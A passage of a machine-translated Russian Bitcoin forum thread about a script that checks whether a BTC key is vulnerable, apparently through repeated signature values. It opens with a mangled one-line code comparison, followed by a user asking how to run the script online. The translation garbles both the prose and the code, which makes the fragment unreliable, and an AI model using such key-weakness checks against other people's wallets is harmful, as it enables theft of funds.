если входы [XI] [10:74] == входы [х + Zi] [10:74]:

когда нужна помощь спросить меня. Спасибо
ca333 сейчас офлайн Пожаловаться на ca333   Ответить с цитированием Мультицитирование сообщения от ca333 Быстрый ответ на сообщение ca333

8 марта 2015, 10:54:32 AM   # 20
 
 
Сообщения: 352
Цитировать по имени
цитировать ответ
по умолчанию Re: Проверьте, установлена ​​ли BTC-ключ уязвим

там, как запустить этот скрипт в Интернете?
FabioCarpi сейчас офлайн Пожаловаться на FabioCarpi   Ответить с цитированием Мультицитирование сообщения от FabioCarpi Быстрый ответ на сообщение FabioCarpi



Как заработать Биткоины?

Bitcoin Wallet * Portefeuille Bitcoin * Monedero Bitcoin * Carteira Bitcoin * Portafoglio Bitcoin * Bitcoin Cüzdan * 比特币钱包

bitcoin-zarabotat.ru
Почта для связи: bitcoin-zarabotat.ru@yandex.ru

3HmAQ9FkRFk6HZGuwExYxL62y7C1B9MwPW